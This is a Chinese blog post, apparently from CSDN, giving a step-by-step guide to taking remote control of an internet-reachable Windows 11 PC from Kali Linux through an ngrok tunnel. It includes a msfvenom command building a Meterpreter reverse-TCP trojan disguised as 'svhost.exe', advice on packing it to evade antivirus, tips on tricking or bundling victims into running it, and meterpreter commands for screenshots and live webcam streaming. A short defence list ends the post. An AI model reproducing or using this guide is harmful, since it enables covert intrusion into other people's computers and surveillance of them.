模拟黑客使用Kali Linux远程控制Windows(互联网)

已于 2023-02-08 00:07:50 修改
阅读量3.2k 收藏 58
点赞数 5
分类专栏: Kali Linux 文章标签: 网络安全 系统安全 Powered by 金山文档
于 2023-01-29 12:32:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HKBlackeagle/article/details/128787548
版权

仅限于技术交流,请勿用于非法用途!

网上很多的教程都是在VMware虚拟机中实现通过kali linux控制windows电脑,正巧我这儿有闲置的笔记本,为了更真实的模拟黑客攻击电脑的行为,做以下实验

使用工具:

虚拟机:Vmware Workstation

控制端系统:Kali Linux

内网穿透:sunny-ngrok

被控端系统:Windows 11

一、安装Vmware Workstation软件,搭建Kali Linux虚拟机

本实验使用VM15虚拟机:

注意,因为我们最终要实现通过kali控制外网的电脑,因此我们要将网络连接改为桥接模式

二、建立隧道

隧道的目的为了将被控端的内网的数据传输到外网,以便使用kali进行远程控制

这里我们使用Sunny-Ngrok的内网穿透服务(测试使用了三天,挺稳定的)

1、用户注册

2、实名认证

3、购买隧道

Sunny-Ngrok官网有详细教程,本文就不细说了,直接购买即可,总共花了¥8(使用时间一个月)

4、建立隧道

隧道协议选tcp,隧道名称和远程端口都需要自己定,本地ip为kali的ip,本地端口自己定:

建立好之后会生成隧道id,隧道id一定要保密:

5、点击客户端下载,选择Linux(32Bit还是64Bit要看自己笔记本是多少位的[目前大多数都是64位])

使用unzip命令把下载好的客户端解压出来,启动客户端:

此时隧道建立成功:

三、制作木马

在kali中使用msf工具制作木马(木马本例命名为svhost.exe,大家可以自行设置):

命令如下:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=远程地址 LPORT=隧道端口 -f exe > /root/svhost.exe

四、加壳

大家根据自己需要,因为我是关闭杀毒软件进行测试的,包括被控端(windows 11)的微软的安全中心也是关闭的

加壳的目的是为了防止杀毒软件报毒,以免被杀,至于使用什么加壳工具,网上很多,大家可以自行选择,如果感兴趣的可以把生成出来的木马编译一下,已达到免杀的目的

五、开启本地监听,查看配置,执行exploit/run等待被控端运行

六、木马上线

可以使用诱导、捆绑、远程执行等方式让其运行~

因为本例属于实验测试,所以直接拿U盘拷贝过去执行上线即可

小电脑的屏幕为kali在msf中执行screenshot命令的截图,截取大电脑当前的屏幕信息(右边显示器的信息为隧道页面,忽略即可)

远程开启电脑摄像头视频

上面的视频为2023年1月26日在kalilinux系统中使用msf工具执行webcam_stream命令远程调用实时摄像头画面(不太会打码,不过web页面中的字可以看清楚)

当拿到被控端权限之后,还可以做的包含但不限于:

sysinfo 获取有关远程系统的信息
getdesktop 获取当前meterpreter桌面
keyboard_send 发送键击
mouse 发送鼠标事件
screenshare 屏幕共享实时监视远程用户桌面
screenshot 截图获取交互式桌面的截图
webcam_stream 远程开启摄像头
上传下载被控端的内容等等等等

如果是内网,很有可能拿下内网的更多电脑权限^_^

七、防范

1、陌生的.exe不要轻易执行,一定要从官网下载软件

2、windows的安全中心不要关闭!不要关闭!不要关闭!

3、安装杀毒软件(和第二点并不冲突)

4、……

hkblackeagle
关注
  • 5
    点赞
  • 58
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Kali Linux远程控制
qq_71207842的博客
06-12 2313
如果可以选择的话,你觉得黑客最希望对目标系统做些什么呢? 1、让目标系统上的服务崩溃。 2、在目标系统上执行某个程序。 3、直接控制目标系统。 是不是第3个选择是最激动人心的呢?
渗透教程1(kali,metaspolit).pdf
02-07
在渗透测试中,Meterpreter通常作为载荷使用,提供远程控制能力。 - **Reverse HTTPS**:使用HTTPS协议的Meterpreter反弹式载荷,相比于HTTP或其他协议,HTTPS提供了更好的隐蔽性,因为它的流量看起来与正常的HTTPS...
Kali Linux利用MSF渗透Windows11电脑
Xiao5ovo的博客
03-02 5507
Msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。
如何使用kali来入侵(渗透)一台windows_kali利用win11漏洞
最新发布
ewii12567的博客
06-15 755
工具:一台带有kali linux系统的虚拟机,一个聪明的大脑开始前我们先需要将kali虚拟机改为桥接网络模式,否则会导致渗透失败1.打开虚拟机,点击虚拟机2.点击设置3.点击网络适配器,看左边点击桥接模式,点击确定即可好了,现在我们就要正式渗透一个windows系统啦,兴不兴奋?1.打开虚拟机2.打开终端,输入sudo su进入root用户权限3.进入root权限后输入ifconfig查看本机ip地址,eth0旁边192开头的为本机ip。
kali生成后门远程控制电脑或手机
wutiangui的博客
05-07 3407
问题:Metasploit渗透测试中出的错误 Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).点击.exe文件直接运行安装,运行,下一步,直接完成安装。Android模拟器(靶机1):192.168.0.106。2.1首先从官网上下载模拟器雷电地址点击打开链接。靶机:192.168.25.106。二、环境配置二Android模拟器。
如何使用Kali远程桌面访问Windows 10或11
美国主机评测
04-18 1338
远程桌面协议 (RDP) 可在所有 Windows 系统上使用,因为它是由 Microsoft 开发的,用于像物理系统一样连接和使用远程可用的 Windows 系统。但是,要检查防火墙是否允许该应用程序,你可以转到Windows“开始”菜单并搜索“允许应用程序通过防火墙”,出现后单击将其打开。在本教程中,我们将使用 Remmina 在 Kali Linux 上轻松使用远程桌面协议。更新系统后,使用系统默认的APT包管理器安装Remmina软件,该软件可以通过Kali Linux的默认系统存储库安装。
使用windows远程连接kali的桌面
m0_51395584的博客
11-25 5881
使用windows远程连接kali的桌面
如何使用kali来入侵(渗透)一台windows
热门推荐
qq_46406833的博客
05-17 2万+
此文章为网络安全爱好者小白设计的,所以木马没做免杀,渗透前请把防火墙和杀毒软件关闭
矛与盾—远程攻击与防御
03-07
渗透测试(Penetration Testing,简称Pen Test)是一种通过模拟黑客攻击来评估计算机网络或应用程序安全性的过程。其目的是识别并利用系统中的漏洞,进而为修复提供指导建议。对于组织而言,定期进行渗透测试可以...
Linux渗透教程
11-18
渗透测试是模拟黑客攻击的行为,但其目的是为了改善系统安全,而非造成破坏。它包括了多种技术和工具,如扫描、漏洞利用、权限提升等步骤,最终目标是获取系统控制权或验证安全防线的有效性。 在Linux渗透中,...
TheFatRat最新版本下载
12-07
TheFatRat是一款广泛用于安全研究的黑客工具,尤其在Kali Linux环境下被广大安全研究人员和渗透测试专家所采用。它的最新版本提供了更多的功能和优化,以满足不断变化的安全需求。这款工具的主要特点在于其免杀能力...
115_使用 CrackMapExec 进行 NTLM Hash 传递攻击1
08-03
安装CrackMapExec,例如在Kali Linux上,可以通过`apt-get install crackmapexec`命令完成。 Mimikatz 是另一个著名的安全工具,用于获取Windows系统的敏感信息,包括NTLM Hash。通过运行Mimikatz,攻击者可以使用`...
E021-渗透测试常用工具-使用Kimi生成deb包进行代码捆绑实践.pdf
12-02
渗透测试是网络安全领域中的一种重要方法,用于模拟黑客攻击,以评估系统的安全性。在这个过程中,使用各种工具来发现和利用漏洞。"E021-渗透测试常用工具-使用Kimi生成deb包进行代码捆绑实践"是关于如何利用Kimi...
关于如何使用shellter以及shielden对于正常软件的双重加壳,过火绒和360
07-16
2. **Kali Linux与Wine**:在Kali Linux中,由于默认不支持直接运行Windows应用程序,因此需要安装Wine和wine32来模拟Windows环境,以便运行像Shellter这样的Windows工具。Wine32是Wine的一个32位版本,使得64位的...
E026-渗透测试常用工具-使用meterpreter模块进行后渗透测试.pdf
12-02
Kali Linux(渗透机)上,可以通过`msfconsole`命令启动Metasploit框架,然后使用`use exploit/windows/smb/ms08_067_netapi`调用针对Windows 2003/xp的MS08-067漏洞的攻击模块。`show options`命令用于查看需要...
中职网络空间安全D模块防御报告
05-12
首先,报告提到了测试环境的构建,包括攻击机(Kali Linux 2021)和靶机(Windows 7)。在这一阶段,使用nmap命令 `-sn -PR 172.16.100.0/24` 对目标IP范围进行ping扫描,确定靶机的IP地址,即172.16.100.153。 ...
利用kali Linux 渗透windows 操作系统
YJlio的博客
03-05 7479
利用kali Linux 渗透windows 操作系统 一、实验目的:使用kali生成木马,渗透windows系统 二、实验内容: 使用kali中的Metasploit生成木马,控制windows系统 三、实验环境 需要从VMware Workstation 中创建两台虚拟机 一台kali linux和一台靶机windows系统 1、攻击者ip(kali) 192.168.63.21 2、靶机ip(windows)192.168.63.20 四、实验步骤 先将虚拟机的网络模式修改为桥接模
kali系统入侵电脑windows(win11系统)渗透测试,骇入电脑教学
这个博主不懒,但Ta什么也没写~(私信互关24小时必回)
01-27 5517
本次渗透测试将使用kali虚拟机(攻击机)对本机(靶机)进行入侵并监控屏幕。
Kali远程操纵win7
2301_81475812的博客
03-28 557
攻击方:kali IPV4:192.168.92.133被攻击方:win7 IPV4:192.168.92.130。
kali linux远程控制
08-06
使用工具如 msfvenom 可以生成被控端文件,其中使用的反向远程控制软件是 windows/meterpreter/reverse_tcp,需要设置 lhost 参数的值为 Kali Linux 的 IP 地址。生成的被控端文件可以在目标设备上运行,以实现远程...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值